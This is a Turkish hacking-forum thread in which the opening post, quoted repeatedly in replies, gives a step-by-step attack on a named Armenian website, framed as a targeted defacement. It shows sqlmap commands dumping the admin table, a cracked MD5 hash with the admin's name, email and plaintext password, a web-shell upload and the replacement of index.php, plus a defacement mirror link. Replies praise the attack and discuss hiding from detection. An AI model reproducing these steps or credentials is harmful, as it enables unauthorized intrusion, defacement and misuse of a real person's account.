Sql injection kullanarak ermeni sitesine index atalim.

YusufHan81

Üye
24 Haz 2020
123
18
bu sorumun cevabini merak ediyorum.Ikincini seciyorsan bir sey diyemem her dusunceye saygi duyarim.Kafa yapilari farkli.Herkes kendine gore hakli ola bilir.Ama bu kadar tht manifestosuna ters dusuyorsan sahsen ben bunlari yanlis bir sey olarak kabul etseydim forumda takilmazdim.Hesabimi siler giderdim.
kartında bulunan varlıklara göre, sitenin değerine ve saygınlığına göre değişir bu seçeceğin opsiyon. ki suçun büyüğü küçüğü olmaz. illegal illegaldir, meşrulaştırmanın manası yok. rastlamadığınız, alışagelmedik etik dışı olaylar insanın etiklik algısını böyle değiştiriyor işte.
 

ACE Veen

Uzman üye
4 Şub 2023
1,097
551
Belirsiz
Merhabalar sizleri her yerde konu olmus teorik sql bilgileri vererek tutmak istemiyorum.
NOT:Yeni arkadaslar icin en temel ve anlasilir duzeyde anlatmak istiyorum.
Bu yuzden hemen icraata gecelim.Teorik olarak sqli anlayipta uygulayamayan yeni arkadaslarimiz icin faydali olur umarim.
//Hedef sitemiz:https://shogun.am/
Ilk adim sitede id degeri arayalim.
Ctrl u yapalim ve arama kutucuguna .php?id= yazalim.
rSJE0f.png
Gordugunuz gibi id degeri olan urller onumuze cikti.Bunu admin paneli ararkende kullana bilirsiniz.
Her hangi birine girelim ve id degerinin sonuna tirnak isareti atalim.
rSJnGS.png

rSJJbb.png

Ve evet fotograf ve yazilar kayboldu.Burada sql injection mevcut.
Yeni baslayanlar icin manual olarak degilde sqlmap kullanarak db bilgilerini cekelim.
Komutlar
1 - sqlmap -u "https://shogun.am/product.php?id=1" --random-agent --dbs --batch
rSJC8t.png
2- sqlmap -u "https://shogun.am/product.php?id=1" -D shogun --tables
rSJuEc.png

3-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin,users--columns
rSJxNR.png

4-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin -C users,admail,name --dump
rSJH4Y.png

rSJNr0.png

gordugunuz gibi admin robert avetyan diye birisine ait.Gmail ile md5 sifreyi eslestirince avetyan isimli admine uygun geliyor.

db biraz karisik ama mantik yuruterek anlasiliyor.

Sitemizin admin panelini /admin.php /administrator /login.php diye deniyorum ve ilkine uygun geldigini goruyorum.

md5 sifremizi hashes.com sitesini kullanarak cozelim.

su anda resim upload sitelerinde problem ciktigi icin konuya gorselsiz devam ediyorum.

6b73be608d77388bb9bf90cf1f8e0d50:RoB&112358
sifremizi bulduk.

[email protected]
RoB&112358

yazarak admin paneline giris yapiyoruz ve ilk resim upload yerinden shellimizi atiyoruz.
buyurun shellimiz bu :)
httpdocs dizinine giderek index.php yi bulup duzenle diyoruz.
https://shogun.am/ ve sitemize indeximizi atiyoruz.

Shelli silmezseniz sevinirim.Arkadaslar uzerinde arastirma yapsin.

Iyi forumlar dilerim.
Mirrorumuzuda alalim degil mi ? :) https://ownzyou.com/zone/147171
ELİNİZE SAĞLIK HOCAM
 

Agent-47

Katılımcı Üye
23 Mar 2023
411
261
HACKERİSTAN
Merhabalar sizleri her yerde konu olmus teorik sql bilgileri vererek tutmak istemiyorum.
NOT:Yeni arkadaslar icin en temel ve anlasilir duzeyde anlatmak istiyorum.
Bu yuzden hemen icraata gecelim.Teorik olarak sqli anlayipta uygulayamayan yeni arkadaslarimiz icin faydali olur umarim.
//Hedef sitemiz:https://shogun.am/
Ilk adim sitede id degeri arayalim.
Ctrl u yapalim ve arama kutucuguna .php?id= yazalim.
rSJE0f.png
Gordugunuz gibi id degeri olan urller onumuze cikti.Bunu admin paneli ararkende kullana bilirsiniz.
Her hangi birine girelim ve id degerinin sonuna tirnak isareti atalim.
rSJnGS.png

rSJJbb.png

Ve evet fotograf ve yazilar kayboldu.Burada sql injection mevcut.
Yeni baslayanlar icin manual olarak degilde sqlmap kullanarak db bilgilerini cekelim.
Komutlar
1 - sqlmap -u "https://shogun.am/product.php?id=1" --random-agent --dbs --batch
rSJC8t.png
2- sqlmap -u "https://shogun.am/product.php?id=1" -D shogun --tables
rSJuEc.png

3-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin,users--columns
rSJxNR.png

4-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin -C users,admail,name --dump
rSJH4Y.png

rSJNr0.png

gordugunuz gibi admin robert avetyan diye birisine ait.Gmail ile md5 sifreyi eslestirince avetyan isimli admine uygun geliyor.

db biraz karisik ama mantik yuruterek anlasiliyor.

Sitemizin admin panelini /admin.php /administrator /login.php diye deniyorum ve ilkine uygun geldigini goruyorum.

md5 sifremizi hashes.com sitesini kullanarak cozelim.

su anda resim upload sitelerinde problem ciktigi icin konuya gorselsiz devam ediyorum.

6b73be608d77388bb9bf90cf1f8e0d50:RoB&112358
sifremizi bulduk.

[email protected]
RoB&112358

yazarak admin paneline giris yapiyoruz ve ilk resim upload yerinden shellimizi atiyoruz.
buyurun shellimiz bu :)
httpdocs dizinine giderek index.php yi bulup duzenle diyoruz.
https://shogun.am/ ve sitemize indeximizi atiyoruz.

Shelli silmezseniz sevinirim.Arkadaslar uzerinde arastirma yapsin.

Iyi forumlar dilerim.
Mirrorumuzuda alalim degil mi ? :) https://ownzyou.com/zone/147171
eline sağlık yeni başlayanlar için yararlı konu :)
 

VerbalAgressia

Yeni üye
21 Haz 2023
4
1
ee, nolmuş. sonuç olarak etik bir grup değil tht. yasalara göre bol bol illegal iş çevriliyor. bunu inkar etmenize gerek yok.
Dostum kafani kullan insani sinirlendirme.
Birinin kredi kartini calirsan onun insani hakkina girecek olursun. Parasini calarsin.
sitesine basarsan birsey olmaz. adam bi yedek atar site yerine gelir.
sen daha kredi kartinin cezasini ve bir sisteme sizmanin cezasinin legal illegal olan olmayan tarafini anlamadiysan cevap yazmana gerek yok
 

LLeneva

Yeni üye
28 May 2023
7
2
19
Rusya, Novosibirsk oblastı
Merhabalar sizleri her yerde konu olmus teorik sql bilgileri vererek tutmak istemiyorum.
NOT:Yeni arkadaslar icin en temel ve anlasilir duzeyde anlatmak istiyorum.
Bu yuzden hemen icraata gecelim.Teorik olarak sqli anlayipta uygulayamayan yeni arkadaslarimiz icin faydali olur umarim.
//Hedef sitemiz:https://shogun.am/
Ilk adim sitede id degeri arayalim.
Ctrl u yapalim ve arama kutucuguna .php?id= yazalim.
rSJE0f.png
Gordugunuz gibi id degeri olan urller onumuze cikti.Bunu admin paneli ararkende kullana bilirsiniz.
Her hangi birine girelim ve id degerinin sonuna tirnak isareti atalim.
rSJnGS.png

rSJJbb.png

Ve evet fotograf ve yazilar kayboldu.Burada sql injection mevcut.
Yeni baslayanlar icin manual olarak degilde sqlmap kullanarak db bilgilerini cekelim.
Komutlar
1 - sqlmap -u "https://shogun.am/product.php?id=1" --random-agent --dbs --batch
rSJC8t.png
2- sqlmap -u "https://shogun.am/product.php?id=1" -D shogun --tables
rSJuEc.png

3-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin,users--columns
rSJxNR.png

4-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin -C users,admail,name --dump
rSJH4Y.png

rSJNr0.png

gordugunuz gibi admin robert avetyan diye birisine ait.Gmail ile md5 sifreyi eslestirince avetyan isimli admine uygun geliyor.

db biraz karisik ama mantik yuruterek anlasiliyor.

Sitemizin admin panelini /admin.php /administrator /login.php diye deniyorum ve ilkine uygun geldigini goruyorum.

md5 sifremizi hashes.com sitesini kullanarak cozelim.

su anda resim upload sitelerinde problem ciktigi icin konuya gorselsiz devam ediyorum.

6b73be608d77388bb9bf90cf1f8e0d50:RoB&112358
sifremizi bulduk.

[email protected]
RoB&112358

yazarak admin paneline giris yapiyoruz ve ilk resim upload yerinden shellimizi atiyoruz.
buyurun shellimiz bu :)
httpdocs dizinine giderek index.php yi bulup duzenle diyoruz.
https://shogun.am/ ve sitemize indeximizi atiyoruz.

Shelli silmezseniz sevinirim.Arkadaslar uzerinde arastirma yapsin.

Iyi forumlar dilerim.
Mirrorumuzuda alalim degil mi ? :) https://ownzyou.com/zone/147171
abi ben yine anlamadım :D
 

rootibo

Kıdemli Üye
13 Mar 2023
2,168
1,459
Merhabalar sizleri her yerde konu olmus teorik sql bilgileri vererek tutmak istemiyorum.
NOT:Yeni arkadaslar icin en temel ve anlasilir duzeyde anlatmak istiyorum.
Bu yuzden hemen icraata gecelim.Teorik olarak sqli anlayipta uygulayamayan yeni arkadaslarimiz icin faydali olur umarim.
//Hedef sitemiz:https://shogun.am/
Ilk adim sitede id degeri arayalim.
Ctrl u yapalim ve arama kutucuguna .php?id= yazalim.
rSJE0f.png
Gordugunuz gibi id degeri olan urller onumuze cikti.Bunu admin paneli ararkende kullana bilirsiniz.
Her hangi birine girelim ve id degerinin sonuna tirnak isareti atalim.
rSJnGS.png

rSJJbb.png

Ve evet fotograf ve yazilar kayboldu.Burada sql injection mevcut.
Yeni baslayanlar icin manual olarak degilde sqlmap kullanarak db bilgilerini cekelim.
Komutlar
1 - sqlmap -u "https://shogun.am/product.php?id=1" --random-agent --dbs --batch
rSJC8t.png
2- sqlmap -u "https://shogun.am/product.php?id=1" -D shogun --tables
rSJuEc.png

3-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin,users--columns
rSJxNR.png

4-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin -C users,admail,name --dump
rSJH4Y.png

rSJNr0.png

gordugunuz gibi admin robert avetyan diye birisine ait.Gmail ile md5 sifreyi eslestirince avetyan isimli admine uygun geliyor.

db biraz karisik ama mantik yuruterek anlasiliyor.

Sitemizin admin panelini /admin.php /administrator /login.php diye deniyorum ve ilkine uygun geldigini goruyorum.

md5 sifremizi hashes.com sitesini kullanarak cozelim.

su anda resim upload sitelerinde problem ciktigi icin konuya gorselsiz devam ediyorum.

6b73be608d77388bb9bf90cf1f8e0d50:RoB&112358
sifremizi bulduk.

[email protected]
RoB&112358

yazarak admin paneline giris yapiyoruz ve ilk resim upload yerinden shellimizi atiyoruz.
buyurun shellimiz bu :)
httpdocs dizinine giderek index.php yi bulup duzenle diyoruz.
https://shogun.am/ ve sitemize indeximizi atiyoruz.

Shelli silmezseniz sevinirim.Arkadaslar uzerinde arastirma yapsin.

Iyi forumlar dilerim.
Mirrorumuzuda alalim degil mi ? :) https://ownzyou.com/zone/147171
hocam elinize saglik kart varmiya kart 😀
 

Yagami Light0

Katılımcı Üye
5 May 2023
699
307
Merhabalar sizleri her yerde konu olmus teorik sql bilgileri vererek tutmak istemiyorum.
NOT:Yeni arkadaslar icin en temel ve anlasilir duzeyde anlatmak istiyorum.
Bu yuzden hemen icraata gecelim.Teorik olarak sqli anlayipta uygulayamayan yeni arkadaslarimiz icin faydali olur umarim.
//Hedef sitemiz:https://shogun.am/
Ilk adim sitede id degeri arayalim.
Ctrl u yapalim ve arama kutucuguna .php?id= yazalim.
rSJE0f.png
Gordugunuz gibi id degeri olan urller onumuze cikti.Bunu admin paneli ararkende kullana bilirsiniz.
Her hangi birine girelim ve id degerinin sonuna tirnak isareti atalim.
rSJnGS.png

rSJJbb.png

Ve evet fotograf ve yazilar kayboldu.Burada sql injection mevcut.
Yeni baslayanlar icin manual olarak degilde sqlmap kullanarak db bilgilerini cekelim.
Komutlar
1 - sqlmap -u "https://shogun.am/product.php?id=1" --random-agent --dbs --batch
rSJC8t.png
2- sqlmap -u "https://shogun.am/product.php?id=1" -D shogun --tables
rSJuEc.png

3-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin,users--columns
rSJxNR.png

4-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin -C users,admail,name --dump
rSJH4Y.png

rSJNr0.png

gordugunuz gibi admin robert avetyan diye birisine ait.Gmail ile md5 sifreyi eslestirince avetyan isimli admine uygun geliyor.

db biraz karisik ama mantik yuruterek anlasiliyor.

Sitemizin admin panelini /admin.php /administrator /login.php diye deniyorum ve ilkine uygun geldigini goruyorum.

md5 sifremizi hashes.com sitesini kullanarak cozelim.

su anda resim upload sitelerinde problem ciktigi icin konuya gorselsiz devam ediyorum.

6b73be608d77388bb9bf90cf1f8e0d50:RoB&112358
sifremizi bulduk.

[email protected]
RoB&112358

yazarak admin paneline giris yapiyoruz ve ilk resim upload yerinden shellimizi atiyoruz.
buyurun shellimiz bu :)
httpdocs dizinine giderek index.php yi bulup duzenle diyoruz.
https://shogun.am/ ve sitemize indeximizi atiyoruz.

Shelli silmezseniz sevinirim.Arkadaslar uzerinde arastirma yapsin.

Iyi forumlar dilerim.
Mirrorumuzuda alalim degil mi ? :) https://ownzyou.com/zone/147171
Konu guzel elinize saglik
 

KaliNiko

Üye
21 May 2023
53
3
Merhabalar sizleri her yerde konu olmus teorik sql bilgileri vererek tutmak istemiyorum.
NOT:Yeni arkadaslar icin en temel ve anlasilir duzeyde anlatmak istiyorum.
Bu yuzden hemen icraata gecelim.Teorik olarak sqli anlayipta uygulayamayan yeni arkadaslarimiz icin faydali olur umarim.
//Hedef sitemiz:https://shogun.am/
Ilk adim sitede id degeri arayalim.
Ctrl u yapalim ve arama kutucuguna .php?id= yazalim.
rSJE0f.png
Gordugunuz gibi id degeri olan urller onumuze cikti.Bunu admin paneli ararkende kullana bilirsiniz.
Her hangi birine girelim ve id degerinin sonuna tirnak isareti atalim.
rSJnGS.png

rSJJbb.png

Ve evet fotograf ve yazilar kayboldu.Burada sql injection mevcut.
Yeni baslayanlar icin manual olarak degilde sqlmap kullanarak db bilgilerini cekelim.
Komutlar
1 - sqlmap -u "https://shogun.am/product.php?id=1" --random-agent --dbs --batch
rSJC8t.png
2- sqlmap -u "https://shogun.am/product.php?id=1" -D shogun --tables
rSJuEc.png

3-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin,users--columns
rSJxNR.png

4-sqlmap -u "https://shogun.am/product.php?id=1" -D shogun -T admin -C users,admail,name --dump
rSJH4Y.png

rSJNr0.png

gordugunuz gibi admin robert avetyan diye birisine ait.Gmail ile md5 sifreyi eslestirince avetyan isimli admine uygun geliyor.

db biraz karisik ama mantik yuruterek anlasiliyor.

Sitemizin admin panelini /admin.php /administrator /login.php diye deniyorum ve ilkine uygun geldigini goruyorum.

md5 sifremizi hashes.com sitesini kullanarak cozelim.

su anda resim upload sitelerinde problem ciktigi icin konuya gorselsiz devam ediyorum.

6b73be608d77388bb9bf90cf1f8e0d50:RoB&112358
sifremizi bulduk.

[email protected]
RoB&112358

yazarak admin paneline giris yapiyoruz ve ilk resim upload yerinden shellimizi atiyoruz.
buyurun shellimiz bu :)
httpdocs dizinine giderek index.php yi bulup duzenle diyoruz.
https://shogun.am/ ve sitemize indeximizi atiyoruz.

Shelli silmezseniz sevinirim.Arkadaslar uzerinde arastirma yapsin.

Iyi forumlar dilerim.
Mirrorumuzuda alalim degil mi ? :) https://ownzyou.com/zone/147171
tewekkur edirem dostum. bir wey soruwum ama - her istenilen hedef saytda bunu yazib tetbiq etmeliyik ? .php?id= yoxsa saytdan sayta ferq var ? bilmek isteyirem ki, butun istenilen sayta burda yazilanlari tetbiq ede bilerik yoxsa her sayta uygun bir simvol , iware , xususi wifre yazmaliyiq ? bir de bunu tetbiq ederken aciq awikar ede bilerik yoxsa ozumuzu gizli tutub sonra hucum etmeliyik ? biraz etrafli bawa salardin da ozelden , xahiw edirem

bu sorumun cevabini merak ediyorum.Ikincini seciyorsan bir sey diyemem her dusunceye saygi duyarim.Kafa yapilari farkli.Herkes kendine gore hakli ola bilir.Ama bu kadar tht manifestosuna ters dusuyorsan sahsen ben bunlari yanlis bir sey olarak kabul etseydim forumda takilmazdim.Hesabimi siler gid
 

Wodenn

Üye
17 Mar 2022
93
81
Azerbaijan
tewekkur edirem dostum. bir wey soruwum ama - her istenilen hedef saytda bunu yazib tetbiq etmeliyik ? .php?id= yoxsa saytdan sayta ferq var ? bilmek isteyirem ki, butun istenilen sayta burda yazilanlari tetbiq ede bilerik yoxsa her sayta uygun bir simvol , iware , xususi wifre yazmaliyiq ? bir de bunu tetbiq ederken aciq awikar ede bilerik yoxsa ozumuzu gizli tutub sonra hucum etmeliyik ? biraz etrafli bawa salardin da ozelden , xahiw edirem
yox qardas her saytda ayri simvola zad ehtiyac yoxdu sql sqldi her saytda eynidi.Aze ve Tr domenleri vurmadiqin muddetce gizlenmeye ehtiyac yoxdu gedibde fbini vurmayacaqsansa . Onsuzda seni tapmaq isteyen tapir axir evvel
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.